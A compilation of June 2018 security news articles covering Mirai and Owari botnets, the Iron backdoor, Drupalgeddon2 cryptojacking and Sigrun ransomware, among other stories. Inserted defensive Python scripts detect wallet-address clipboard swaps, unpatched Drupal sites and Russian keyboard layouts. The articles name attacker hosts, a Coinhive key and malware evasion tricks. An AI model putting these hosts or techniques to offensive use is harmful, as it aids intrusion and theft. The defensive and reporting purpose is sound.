"Given the interest from Congress, we wanted to make clear that all the information from these integrations with Huawei was stored on the device, not on Huawei's servers."

Facebook also had data access deals with Lenovo, OPPO and TCL of China, according to Varela.

"Facebook's integrations with Huawei, Lenovo, OPPO and TCL were controlled from the get go," Varela said.

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

"Concerns about Huawei aren't new," US Senator Mark Warner, vice chairman of the senate select committee on intelligence, said Tuesday in a released statement.

"I look forward to learning more about how Facebook ensured that information about their users was not sent to Chinese servers."

Facebook said that it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

Before now-ubiquitous apps standardized the social media experience on smartphones, some 60 device makers like Amazon, Apple, Blackberry, HTC, Microsoft and Samsung worked with Facebook to adapt interfaces for the Facebook website to their own phones, the company said.

Facebook said it is winding up the interface arrangements with device makers as the company's smartphone apps dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The social media leader said it "disagreed" with the conclusions of a New York Times report that found that the device makers could access information on Facebook users' friends without their explicit consent.

Facebook enabled device makers to interface with it at a time when it was building its service and they were developing new smartphone and social media technology.

But the report raised concerns that massive databases on users and their friends -- including personal data and photographs -- could be in the hands of device makers.

Mirai Variants Continue to Spawn in Vulnerable IoT Ecosystem
6.6.2018 securityweek BotNet

Mirai is the archetypal IoT botnet, first achieving infamy with a 665 Gbps DDoS attack against the KrebsOnSecurity website in September 2016. Within days, a second Mirai attack targeted the French hosting firm, OVH, with an attack that peaked at nearly 1 Tbps. These were, at the time, the largest DDoS attacks ever recorded.

But within a few more days, before the end of September 2016, the Mirai developer released the source code. It can now be found on GitHub. The developer closed his 'readme' file with a criticism of MalwareMustDie and the comment, "Just as I forever be free, you will be doomed to mediocracy forever."

He didn't remain free for very long. In January 2017, Brian Krebs identified Paras Jha as authoring Mirai; and in December 2017 the DoJ unsealed a plea-bargained guilty plea by Paras Jha for the development and use of Mirai. But it was too late to stop Mirai, because the code was in the public domain -- and it has ever since been used as the basic building block for other criminals to develop Mirai variants for their own use.

Network performance firm Netscout Arbor has taken a close look at four of the current Mirai variants: Satori, JenX, OMG and Wicked. Its Arbor Security Engineering & Response Team (ASERT) published a recent blog post describing how each of these botnets starts from the basic building blocks of Mirai and adds to, and sometimes removes from, the original Mirai functionality -- adding, says ASERT, "their own flair."

Mirai itself spread by scanning for other internet-connected IoT devices (IP cameras and home routers) and 'brute-forcing' access via a list of default vendor passwords. Since so few consumers ever change the password that comes with the device, the process is remarkably successful. Paras Jha claimed that he had 380,000 bots in Mirai at the time of the Krebs attack.

Satori (or at least the 3rd variant of Satori) uses the same configuration table and the same string obfuscation technique as Mirai. However, says ASERT, "We see the author expanding on Mirai source code to include different exploits such as the Huawei Home Gateway exploit." The exploit was CVE-2017-17215. In December 2017, Check Point reported that hundreds of thousands of attempts to exploit this vulnerability had been made on Huawei HG532 home routers attempting to download and execute the Satori botnet.

The underlying code for JenX also comes from Mirai, again including the same configuration table and the same string obfuscation technique. However, JenX hard codes the C2 IP address while Mirai stores it in the configuration table. JenX has also removed the scanning and exploitation functions of Mirai, with this being handled by a separate system.

"Currently," writes ASERT, "it appears JenX only focuses on DDoS attacks against players of the video game Grand Theft Auto San Andreas, which has been noted by other researchers."

OMG is described by ASERT as one of the most interesting of Mirai variants. While it includes all Mirai's functionality, "the author expanded the Mirai code to include a proxy server." This allows it to enable a SOCKS and HTTP proxy server on the infected IoT device. "With these two features, the bot author can proxy any traffic of its choosing through the infected IoT device, including additional scans for new vulnerabilities, launching additional attacks, or pivot from the infected IoT device to other networks which are connected to the device."

Fortinet discussed OMG in February 2018. "This is the first time we have seen a modified Mirai capable of DDOS attacks as well as setting up proxy servers on vulnerable IoT devices. With this development, we believe that more and more Mirai-based bots are going to emerge with new ways of monetization," it concluded.

Wicked is the latest Mirai variant. "Similar to Satori variant 3," writes ASERT, "Wicked trades in Mirai's credential scanning function for its own RCE scanner. Wicked's RCE scanner targets Netgear routers and CCTV-DVR devices." When vulnerable devices are found, "a copy of the Owari bot is downloaded and executed."

However, an analysis of the same bot by Fortinet in May 2018 comes to a slightly different conclusion. The string 'SoraLOADER' suggests a purpose to distribute the Sora botnet. Further analysis showed that in practice it attempted to download the Owari botnet, but actually downloaded the Omni botnet. "We can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author's succeeding projects," says Fortinet.

The Mirai developer may have been apprehended, but because he made his source code public, Mirai and its variants continue to proliferate. The IoT ecosphere that Mirai and its variants target and exploit is still in its infancy. There were nearly 17 billion connected devices in 2017; this is expected to rise to around 125 billion by 2030, according to a new analysis from IHS Markit. Vendors continue to rush their products to market in order to gain early market share, but often at the cost of built-in security.

"Malware authors will continue to leverage IoT based malware in automated fashion, quickly increasing the botnet size through worm-like spreading, network proxy functionality, and automated exploitation of vulnerabilities in internet facing devices. It is important for organizations to apply proper patching, updates, and DDoS mitigation strategies to defend their organizations," warns ASERT.

It’s not a joke, Owari botnet operators used root as username and password to access a C&C
6.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet controlled through a poorly configured architecture: the botmaster used weak credentials for authentication to the command-and-control server.

The researchers exploited the weak configuration to take over the MySQL server used to control the Owari botnet: the author left port 3306 open, allowing authentication with "root" as both username and password.

“We observed a few IPs attacking our honeypots with default credentials, executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root”

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Investigating the database, the expert discovered a User table that contains login credentials for the various users who control the botnet. Some entries could be associated with botmasters, others with customers of the botnet.

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”


The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet; he was able to reach a known Owari operator who goes online as “Scarface” and who provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 customers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course not. Even though the expert has taken over the MySQL database, botnet operators continuously change attack IPs to stay under the radar, even when the malicious traffic associated with some of their IPs is detected.

The IPs reported in the expert's analysis are already offline.

North Korea-Linked Covellite APT group stopped targeting organizations in the U.S.
6.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked by experts at industrial cybersecurity firm Dragos as Covellite, has stopped targeting US organizations.
However, the group, which is believed to be linked to the notorious Lazarus APT group, continues to target organizations in Europe and East Asia.

The group has been around since at least 2017 and is still active; it has targeted civilian electric energy organizations to steal intellectual property and gather intelligence on industrial operations.

Unlike other threat actors focused on industrial control systems, Covellite does not appear to be interested in sabotage.

In September 2017, experts from FireEye spotted a wave of attacks launched by the APT group against U.S. electric companies; the phishing messages used weaponized Word documents to deliver a piece of malware.

“COVELLITE compromises networks associated with civilian electric energy worldwide and gathers intelligence on intellectual property and internal industrial operations. COVELLITE lacks an industrial control system (ICS) specific capability at this time.” reads the post published by Dragos.

“COVELLITE operates globally with targets primarily in Europe, East Asia, and North America. US targets emerged in September 2017 with a small, targeted phishing campaign directed at select U.S. electric companies.”

The experts linked the attacks to Pyongyang and confirmed that the group has not shown the ability to disrupt power supply.


According to Dragos, the infrastructure and the malicious code used by the COVELLITE group are similar to the ones used by the LAZARUS APT GROUP, aka Hidden Cobra.

“technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related.” continues the post.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,”

Dragos experts have recently published reports on other hacker groups focused on ICS and SCADA systems, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime.

Thousands of organizations leak sensitive data via misconfigured Google Groups
6.6.2018 securityaffairs Security

Security experts reported that a widespread Google Groups misconfiguration exposes sensitive information.
Administrators of organizations using Google Groups and G Suite must review their configuration to avoid the leakage of internal information.

Security researchers from Kenna Security have recently discovered that 31 percent of the 9,600 organizations analyzed are leaking sensitive e-mail information.

The list of affected entities also includes Fortune 500 companies, hospitals, universities and colleges, newspapers and television stations, and even US government agencies.

“Organizations utilizing G Suite are provided access to the Google Groups product, a web forum directly integrated with an organization’s mailing lists. Administrators may configure a Google Groups interface when creating a mailing list.” reads the blog post published by Kenna Security.

“Due to complexity in terminology and organization-wide vs group-specific permissions, it’s possible for list administrators to inadvertently expose email list contents. In practice, this affects a significant number of organizations”

The discovery is not new: back in 2017, experts found G Suite misconfigurations that can lead to data leakage.

Unfortunately, since the first advisory published by experts at RedLock, many installs continue to leak data. According to Kenna Security, the main reason is that Google Groups uses complex terminology together with a mix of organization-wide and group-specific permissions.


When a G Suite admin creates a Groups mailing list for specific recipients, a web interface for the list is also configured, available to users at https://groups.google.com.

Google Groups privacy settings can be adjusted on both a domain and a per-group basis. In affected organizations, the Groups visibility setting, reachable by searching for “Groups Visibility” after logging into https://admin.google.com, is configured to “Public on the Internet”.


To discover if an organization is affected, administrators can browse to the configuration page by logging into G Suite as an administrator and typing “Settings for Groups for Business” or simply using this direct link.

“In almost all cases – unless you’re explicitly using the Google Groups web interface – this should be set to “Private”.” continues the post.

“If publicly accessible, you may access your organization’s public listing at the following link: https://groups.google.com/a/[DOMAIN]/forum/#!forumsearch/”

Administrators have to set the Google Group to private to protect internal information such as customer reviews, invoices payable, password recovery / reset e-mails, and more.

It is important to highlight that Google doesn’t consider configuration issues to be vulnerabilities; experts recommend that administrators read the Google Groups documentation and set the sharing setting for “Outside this domain – access to groups” to “Private”.

Updated: Microsoft reportedly acquires the GitHub popular code repository hosting service
6.6.2018 securityaffairs IT

Microsoft has reportedly acquired the popular code repository hosting service GitHub, but at the time of writing there is no news about how much Microsoft paid for the platform.
Microsoft has reportedly acquired the popular code repository hosting service GitHub.

GitHub was last valued at $2 billion in 2015, but at the time of writing there is no news about how much Microsoft paid for the platform.

“The software maker has agreed to acquire GitHub, the code-repository company popular with many software developers, and could announce the deal as soon as Monday, according to people familiar with the matter.” reported a post published by Bloomberg.

GitHub’s board decided to sell to Microsoft because of the leadership of Microsoft’s CEO Satya Nadella and his vision for open source technology.

GitHub currently hosts more than 80 million code repositories and holds a privileged position in the software development community; the company that owns the platform could gain strategic benefits from its knowledge of the projects hosted there.

Of course, part of the open source community disagrees with GitHub's move and is opting to switch to competing services such as BitBucket or GitLab.

Bryan Lunduke (Twitter poll, 6:21 PM - Jun 2, 2018):
To those that have @GitHub accounts:

If @Microsoft buys GitHub... would you continue to use it? Or would you move your repositories to a different service?

32% Stick with GitHub
68% Move to another service
632 votes • Final results
Many development teams fear Microsoft could abuse its position after the acquisition by gaining full access to the millions of private projects hosted on GitHub.

The code hosting service GitLab has seen a massive traffic spike after news of the deal, with thousands of projects and code repositories being transferred from GitHub.


At the time of writing, neither Microsoft nor GitHub has commented on the acquisition deal.
Updated on June 4
In a blog post published today, Microsoft confirmed that it will acquire GitHub for $7.5 billion in Microsoft stock.

“GitHub will retain its developer-first ethos and will operate independently to provide an open platform for all developers in all industries. Developers will continue to be able to use the programming languages, tools and operating systems of their choice for their projects — and will still be able to deploy their code to any operating system, any cloud and any device.” reads the blog post.

“Microsoft Corporate Vice President Nat Friedman, founder of Xamarin and an open source veteran, will assume the role of GitHub CEO. GitHub’s current CEO, Chris Wanstrath, will become a Microsoft technical fellow, reporting to Executive Vice President Scott Guthrie, to work on strategic software initiatives.”

NYT: Facebook APIs gave device makers deep access to user data. FB disagrees
6.6.2018 securityaffairs

Facebook APIs granted access to the data belonging to FB users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.
After the Cambridge Analytica privacy scandal, Facebook is now facing new problems because it is accused of sharing user data with over 60 device-makers.

The social network giant had granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions, “Like” buttons, address books, and other features without requiring their users to install a separate app.

“Facebook has reached data-sharing partnerships with at least 60 device makers — including Apple, Amazon, BlackBerry, Microsoft and Samsung — over the last decade, starting before Facebook apps were widely available on smartphones, company officials said.” states the New York Times.

“The deals allowed Facebook to expand its reach and let device makers offer customers popular features of the social network, such as messaging, “like” buttons and address books.”

The controversial practice started more than 10 years ago, before Facebook apps were widely available on smartphones.

The partnerships raise concerns about the company’s privacy protections and compliance with a 2011 consent decree with the Federal Trade Commission. The decree barred the social network giant from sharing data of users’ Facebook friends with other companies without their explicit consent.
To support the accusation, Michael LaForgia, a New York Times reporter, used a 2013 Blackberry device to access his Facebook account with roughly 550 friends.

He discovered that a BlackBerry app called “The Hub” was still able to harvest private data from 556 of his friends, exposing information including religious and political orientation.

The reporter also discovered that The Hub was able to acquire “identifying information” for up to 294,258 friends of his Facebook friends.

“After connecting to Facebook, the BlackBerry Hub app was able to retrieve detailed data on 556 of Mr. LaForgia’s friends, including relationship status, religious and political leanings and events they planned to attend.” continues the NYT.

“Facebook has said that it cut off third parties’ access to this type of information in 2015, but that it does not consider BlackBerry a third party in this case.”

Facebook responded to the accusation of the NYT report in a blog post entitled “Why We Disagree with The New York Times.”

The social network confirmed that the Facebook APIs were created to allow device makers to improve the experience of Facebook users by implementing features in their operating systems; at the time, there were no apps.

“The New York Times has today written a long piece about our device-integrated APIs — software we launched 10 years ago to help get Facebook onto mobile devices.” states the post published by Facebook.

“In the early days of mobile, the demand for Facebook outpaced our ability to build versions of the product that worked on every phone or operating system. It’s hard to remember now, but back then there were no app stores.”

“So companies like Facebook, Google, Twitter and YouTube had to work directly with operating system and device manufacturers to get their products into people’s hands. This took a lot of time—and Facebook was not able to get to everyone.”

“To bridge this gap, we built a set of device-integrated APIs that allowed companies to recreate Facebook-like experiences for their individual devices or operating systems. Over the last decade, around 60 companies have used them—including many household names such as Amazon, Apple, Blackberry, HTC, Microsoft, and Samsung.”

The company added that it carefully monitored the use of the Facebook APIs to prevent abuse, and that device vendors signed agreements preventing Facebook users’ information from being used for other purposes.

“Partners could not integrate the user’s Facebook features with their devices without the user’s permission. And our partnership and engineering teams approved the Facebook experiences these companies built,” continues the post.

“Contrary to claims by the New York Times, friends’ information, like photos, was only accessible on devices when people made a decision to share their information with those friends. We are not aware of any abuse by these companies.”


After more than ten years things have changed, and the Cambridge Analytica scandal has made users aware of the importance of their privacy.

Today both the Facebook iOS and Android apps are very popular and the criticized Facebook APIs are no longer used; for this reason, the company began “winding down” the partnerships in April.

“This is very different from the public APIs used by third-party developers, like Aleksandr Kogan. These third-party developers were not allowed to offer versions of Facebook to people and, instead, used the Facebook information people shared with them to build completely new experiences.” concluded Facebook.

“Now that iOS and Android are so popular, fewer people rely on these APIs to create bespoke Facebook experiences. It’s why we announced in April that we’re winding down access to them. We’ve already ended 22 of these partnerships. As always we’re working closely with our partners to provide alternative ways for people to still use Facebook.”

Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw
6.6.2018 securityaffairs

Security experts at security firm Intezer have recently discovered a backdoor, associated with the operations of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).
The Remote Control System (RCS) is the surveillance software developed by HackingTeam; it was considered a powerful malware also able to infect mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VOIP voice calls (e.g. Skype); the mobile version, available for all the major OSs (Apple, Android, Symbian, and Blackberry), is also able to completely control the handset and its components, including the camera, the microphone and the GPS module.

The Iron cybercrime group has been active since at least 2016 and is known for the Iron ransomware, but over the years it has built various strains of malware, including backdoors, cryptocurrency miners, and ransomware, to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed with UPX; the malicious code is able to determine whether it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor DLL to %localappdata%\Temp\\<random>.dat, then checks the OS version to determine which backdoor to launch.

The malware halts its execution if it detects the presence of Qihoo 360 products. It also installs a malicious root CA certificate used to sign the backdoor binary, then creates a service pointing back to the backdoor.

The analysis of the backdoor revealed that two main functions are shared with the IronStealer and Iron ransomware families: the VM detection code borrowed from HackingTeam’s “Soldier” implant and the DynamicCall module from HackingTeam’s “core” library.


The malware uses a patched version of the popular Adblock Plus Chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

The extension constantly runs in the background as a stealthy host-based crypto-miner. Every minute, the malware checks whether Chrome is running, and can silently launch it if it isn’t.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also includes Adblock Plus for IE, which is capable of injecting remote JavaScript; this functionality, however, is no longer automatically used.

The malware automatically decrypts a hard-coded shellcode that loads a Cobalt Strike beacon in memory, and fetches a payload URL from a hard-coded Pastebin address.

The malicious code is able to drop two malware. a variant of “JbossMiner Mining Worm” tracked as Xagent and the Iron ransomware.

The group used the malware to stealing cryptocurrency from the victim’s workstation, the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets.

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.
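The clipboard swap described above is easy to reason about once the address shapes are written down. The following is an added example, not code from the Iron analysis: it lists the wallet-address patterns a hijacker would match on (an assumption: legacy and bech32 Bitcoin, Ethereum, and standard 95-character Monero addresses; other formats are not covered) and a detector that compares what the user copied with what the clipboard later holds, which is the signal a clipboard-monitoring agent would alert on. The addresses are constructed samples (the Bitcoin one is the well-known wiki example).

```python
import re

# Address shapes a hijacker matches on (assumption: legacy/bech32 Bitcoin,
# Ethereum, standard 95-character Monero; other formats are not covered).
WALLET_PATTERNS = {
    "bitcoin": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{8,87})$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "monero": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}


def classify(text):
    """Name of the currency whose address pattern `text` matches, else None."""
    text = text.strip()
    for name, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def detect_swap(copied, pasted):
    """Alert when the user copied a wallet address but the clipboard now holds
    a different address: the signature of a clipboard hijacker."""
    before, after = copied.strip(), pasted.strip()
    kind_before, kind_after = classify(before), classify(after)
    if kind_before and kind_after and before != after:
        return {"currency": kind_before, "copied": before, "pasted": after}
    return None


def scan_events(events):
    """events: iterable of (copied, pasted) pairs from a clipboard monitor;
    returns the list of alerts."""
    return [alert for alert in (detect_swap(c, p) for c, p in events) if alert]


# Constructed samples: a victim's addresses and attacker substitutes.
VICTIM_BTC = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
ATTACKER_BTC = "1AttackerXv9k3mQbZ7Hj2nFc8tRdw5qYpE"
VICTIM_ETH = "0x" + "ab" * 20
ATTACKER_ETH = "0x" + "cd" * 20
VICTIM_XMR = "4A" + "Bc9" * 31
SAMPLE_EVENTS = [
    ("hello world", "hello world"),  # not an address, ignored
    (VICTIM_BTC, VICTIM_BTC),        # copied and pasted unchanged, fine
    (VICTIM_BTC, ATTACKER_BTC),      # swapped: alert
    (VICTIM_ETH, ATTACKER_ETH),      # swapped: alert
    (VICTIM_XMR, VICTIM_XMR),        # unchanged, fine
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

On a real endpoint the (copied, pasted) pairs would come from a clipboard hook; the point of the check is that a legitimate user never copies one address and pastes a different one of the same shape seconds later.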

Further details, including the IoCs are reported in the blog post published by the researchers.

Over 115,000 Drupal Sites still vulnerable to Drupalgeddon2, a gift to crooks
6.6.2018 securityaffairs

Two months after the release of the security updates for the Drupalgeddon2 flaw, experts continue to see vulnerable websites running flawed versions of Drupal whose owners haven’t installed the security patches.
In March, Drupal developer Jasper Mattsson discovered a “highly critical” vulnerability, tracked as CVE-2018-7600 and dubbed Drupalgeddon2, affecting Drupal 7 and 8.

Both Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw the Drupal Security Team decided to address it with specific security updates, issued a few days later.

The vulnerability could be exploited by an attacker to run arbitrary code on the CMS core component and take over a website just by accessing a URL.

After the publication of a working proof-of-concept for Drupalgeddon2 on GitHub, experts started observing attackers using it to deliver backdoors and crypto miners.


According to security researcher Troy Mursch, there are over 115,000 Drupal sites that have not installed the security patches for the Drupalgeddon2 vulnerability.

The expert, scanning the Internet for websites running the Drupal 7.x CMS, found over 500,000 sites, 115,070 of them running outdated versions of the popular CMS vulnerable to Drupalgeddon2. The scan didn’t cover 6.x and 8.x sites.
“How many Drupal sites are vulnerable? To find the answer, I began by looking for sites using Drupal 7. This is the most widely used version, per Drupal’s core statistics. Using the source code search engine PublicWWW, I was able to locate nearly 500,000 websites using Drupal 7.” states a report published by Mursch.

“Upon completion of the scan I was able to determine:

115,070 sites were outdated and vulnerable.
134,447 sites were not vulnerable.
225,056 sites I could not ascertain the version used.”

The researcher found numerous vulnerable sites in the Alexa Top 1 Million, the list includes major US educational institutions, government organizations around the world, a large television network, a multinational mass media and entertainment conglomerate, and two major computer hardware manufacturers.

The expert shared the list of vulnerable websites with US-CERT and other CERT teams worldwide.

Mursch confirmed that cryptojacking campaigns are continuing even after his first report.

“While scanning for vulnerable sites, I discovered a new cryptojacking campaign targeting Drupal sites. One of the affected sites was a police department’s website in Belgium. This campaign uses the domain name upgraderservices[.]cf to inject Coinhive.” added the expert.

The expert published a Google Docs spreadsheet to track the original cryptocurrency mining campaign; the document now includes data on several different campaigns he discovered.

Bad Packets Report, 31 May 2018: “This Belgium police website (http://votrepolice.be/ ) has been compromised and is now part of the Drupal cryptojacking campaign.”

Bad Packets Report, 31 May 2018: “This case of #cryptojacking is caused by upgraderservices[.]cf/drupal.js which injects #Coinhive. Site key "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos" is used.”
The expert published IoCs for the campaign. The presence online of 115,000 vulnerable Drupal 7.x websites is very dangerous: a gift for crooks, who can abuse them for a broad range of illegal activities.
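The two checks this article describes, version triage of a Drupal 7 site and a look for the Coinhive injection, fit in a few lines. The following is an added example and not Mursch’s or Bad Packets’ tooling. It assumes the scanner has already fetched the site’s CHANGELOG.txt (Drupal 7 ships it in the web root with a first line such as “Drupal 7.58, 2018-03-28”; sites that delete it end up in the “unknown” bucket, much like the 225,056 undetermined sites above) and the rendered HTML of the front page. The fixed version for SA-CORE-2018-002 on the 7.x branch is 7.58; the IoCs are the ones from the tweets quoted above; the HTTP responses are constructed samples.

```python
import re

# SA-CORE-2018-002 (CVE-2018-7600) is fixed in Drupal 7.58; this check covers
# the 7.x branch only, as Mursch's scan did.
FIXED_D7 = (7, 58)

# IoCs from the Bad Packets tweets quoted above (defanged form accepted too).
INJECTED_SCRIPT_RE = re.compile(r"upgraderservices\[?\.\]?cf/drupal\.js", re.I)
COINHIVE_SITE_KEY = "ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos"

# Drupal 7 ships CHANGELOG.txt in the web root; its first line reads
# 'Drupal 7.58, 2018-03-28'. Sites that removed the file become 'unknown'.
CHANGELOG_RE = re.compile(r"^\s*Drupal (\d+)\.(\d+)", re.MULTILINE)


def drupal_version(changelog_text):
    """(major, minor) from the first 'Drupal X.Y' line, or None."""
    m = CHANGELOG_RE.search(changelog_text or "")
    return (int(m.group(1)), int(m.group(2))) if m else None


def drupalgeddon2_status(changelog_text):
    """'vulnerable', 'patched' or 'unknown' for a Drupal 7 site."""
    v = drupal_version(changelog_text)
    if v is None or v[0] != 7:
        return "unknown"  # 6.x/8.x are out of scope of this check
    return "patched" if v >= FIXED_D7 else "vulnerable"


def cryptojacking_iocs(html):
    """Indicators of the Coinhive injection campaign in a fetched page."""
    found = []
    if INJECTED_SCRIPT_RE.search(html):
        found.append("injected script: upgraderservices[.]cf/drupal.js")
    if COINHIVE_SITE_KEY in html:
        found.append("coinhive site key: " + COINHIVE_SITE_KEY)
    return found


def triage(changelog_text, html):
    return {"drupalgeddon2": drupalgeddon2_status(changelog_text),
            "cryptojacking": cryptojacking_iocs(html)}


# Constructed samples standing in for the two HTTP responses.
OLD_CHANGELOG = "Drupal 7.54, 2017-02-01\n-----------------------\n- Fixed security issues...\n"
NEW_CHANGELOG = "Drupal 7.58, 2018-03-28\n-----------------------\n- Fixed security issues...\n"
INFECTED_HTML = ('<html><head><script src="https://upgraderservices.cf/drupal.js"></script>'
                 '<script>var miner = new CoinHive.Anonymous("ZQXBo9BIgCBhlxCYhc7UAWLJxBfRCVos");'
                 'miner.start();</script></head><body>Welcome</body></html>')

if __name__ == "__main__":
    print(triage(OLD_CHANGELOG, INFECTED_HTML))
    print(triage(NEW_CHANGELOG, "<html><body>Welcome</body></html>"))
```

A site that reports “patched” can still be compromised: the patch closes the door but does not evict a miner that was planted before it, so the IoC check is worth running regardless of the version result.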

The author of the Sigrun Ransomware decrypts Russian victims’ files for free
6.6.2018 securityaffairs

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while all other victims have to pay a ransom of $2,500 worth of Bitcoin or Dash.
We have reported several cases where Russian malware authors avoid infecting computers in their own country, but the case we are going to discuss is interesting too.

The author of the Sigrun Ransomware is providing the decryption key to Russian victims for free, while the malware demands a ransom of $2,500 worth of Bitcoin or Dash from everyone else.

The case was first spotted by the malware researcher Alex Svirid, and other experts confirmed his discovery.

Alex Svirid, 31 May 2018: “Sigrun Ransomware author decrypts files for free for users from some former USSR countries (with Russian as primary language)”

S!Ri, in reply: “Yup, many are doing that. Guess who is Russian and who is American?”
The Sigrun ransomware also avoids infecting Russian victims by detecting the keyboard layout, a common trick that lets Russian malware authors avoid attention from local law enforcement.

When Sigrun ransomware is executed, it first checks “HKEY_CURRENT_USER\Keyboard Layout\Preload” to determine whether a Russian layout is installed. If the machine has a Russian layout, it will not encrypt any files and will delete itself.
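The registry values Sigrun inspects are readable by any administrator, so the same check can be run defensively to see which layouts a machine advertises. The following is an added example, not code from the Sigrun analysis: it enumerates HKCU\Keyboard Layout\Preload on Windows and reports which preloaded layouts carry one of the language IDs such ransomware treats as “home”. Windows primary-language IDs are 0x0419 for Russian and 0x0422 for Ukrainian (the two layouts the author mentions); Belarusian (0x0423) is added as an assumption given the author’s “Belarus partners”. The registry read only works on Windows; the parsing is a pure function and the sample values are constructed.

```python
# Windows primary-language IDs live in the low 16 bits of a keyboard layout
# ID, so '00000419' and a flagged variant such as '00010419' both carry 0x0419.
# Russian and Ukrainian are named by the Sigrun author; Belarusian is an
# assumption (the author's "Belarus partners").
LANG_IDS = {0x0419: "Russian", 0x0422: "Ukrainian", 0x0423: "Belarusian"}


def layout_lang_id(preload_value):
    """'00000419' -> 0x0419. Raises ValueError on a malformed value."""
    return int(preload_value, 16) & 0xFFFF


def matching_layouts(preload_values, lang_ids=LANG_IDS):
    """Map each preloaded layout that carries one of lang_ids to its name."""
    found = {}
    for value in preload_values:
        try:
            lid = layout_lang_id(value)
        except ValueError:
            continue  # skip garbage values rather than fail the whole check
        if lid in lang_ids:
            found[value] = lang_ids[lid]
    return found


def read_preload():
    """Windows only: the data of every value under
    HKEY_CURRENT_USER\\Keyboard Layout\\Preload ('1', '2', ... -> layout IDs)."""
    import winreg  # not available on other platforms
    values = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Keyboard Layout\Preload") as key:
        index = 0
        while True:
            try:
                _name, data, _type = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            values.append(data)
            index += 1
    return values


if __name__ == "__main__":
    # Constructed sample (US English plus Russian); replaced by the live
    # registry contents when running on Windows.
    preload = ["00000409", "00000419"]
    try:
        preload = read_preload()
    except ImportError:
        pass
    print(matching_layouts(preload))
```

The same values are what a sandbox or a malware analyst would tweak to make a sample such as Sigrun bail out, which is exactly why the check is a weak signal for the malware author as well.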

